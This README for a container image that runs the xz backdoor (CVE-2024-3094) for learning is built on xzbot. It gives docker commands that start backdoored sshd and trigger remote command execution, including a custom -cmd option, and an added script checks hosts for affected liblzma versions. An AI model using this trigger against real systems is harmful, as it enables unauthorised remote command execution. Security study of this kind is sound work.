
rezigned/xz-backdoor


xz backdoor container image

A container image of the xz backdoor (CVE-2024-3094), based on the amazing work in @amlweems's xzbot project, that runs on both x86_64 and Apple Silicon (via QEMU or Rosetta).

THIS IS FOR LEARNING PURPOSES ONLY!

Demo

xz-backdoor demo

Overview

The xz-backdoor container images don't rely on systemd, because the exploit can be triggered with sshd alone if certain conditions are met. As a result, the container can be started without the --privileged flag, which is considered insecure.

Versions

Both versions of the xz-backdoor are available as image tags.

  • 5.6.0
  • 5.6.1 (latest)
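
A defender-side check that follows from the version list above, as an added example that is not part of this repository or xzbot: it classifies a host from `xz --version` output and `ldd` output for sshd. The function names, sample inputs and result labels are constructed for illustration; linkage is reported separately because the backdoor is only reachable through sshd when sshd loads liblzma.

```sh
#!/bin/sh
# Added example: not part of the xz-backdoor or xzbot projects.
# Affected releases = the two image tags listed under "Versions".
AFFECTED_VERSIONS="5.6.0 5.6.1"

# Constructed sample inputs (not captured from a real host).
SAMPLE_XZ='xz (XZ Utils) 5.6.1
liblzma 5.6.1'
SAMPLE_LDD='  libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f0000000000)
  liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f0000100000)'

# Read `xz --version` text on stdin, print the liblzma version.
liblzma_version() {
  sed -n 's/^liblzma \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Succeed when $1 is one of the backdoored releases.
is_affected_version() {
  for v in $AFFECTED_VERSIONS; do
    [ "$1" = "$v" ] && return 0
  done
  return 1
}

# Classify from `xz --version` text ($1) and `ldd sshd` text ($2).
classify() {
  ver=$(printf '%s\n' "$1" | liblzma_version)
  if [ -z "$ver" ]; then
    echo "unknown"
  elif ! is_affected_version "$ver"; then
    echo "not-affected:$ver"
  elif printf '%s\n' "$2" | grep -q 'liblzma\.so'; then
    echo "affected-sshd-linked:$ver"
  else
    echo "affected-library-only:$ver"
  fi
}

# Check the current host; assumes xz and ldd are on PATH.
audit_host() {
  sshd_path=$(command -v sshd || echo /usr/sbin/sshd)
  classify "$(xz --version 2>/dev/null)" "$(ldd "$sshd_path" 2>/dev/null)"
}

# Run against the host with --host, otherwise against the sample.
if [ "${1:-}" = "--host" ]; then audit_host; else classify "$SAMPLE_XZ" "$SAMPLE_LDD"; fi
```

The `xz` binary on PATH may not match the liblzma that sshd actually loads, so treat a "not-affected" result as a first pass and confirm against the library path shown by `ldd`.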

Getting started

Prerequisites

Usage

1. Start the container image

Tip

A specific version of liblzma can be selected via the image tag, e.g. rezigned/xz-backdoor:5.6.0.

docker run --rm -it -d \
  --name xz-backdoor \
  --platform linux/amd64 \
  rezigned/xz-backdoor:latest

2. Run a command via xzbot

Note

The output of the default command (id) is redirected to /tmp/.xz.

See https://github.com/amlweems/xzbot for more details.

# default command `id > /tmp/.xz`
docker exec -it `docker ps -f name=xz-backdoor -q` ./xzbot

# custom command
docker exec -it `docker ps -f name=xz-backdoor -q` ./xzbot -cmd "uname -a > /tmp/.xz"

Acknowledgements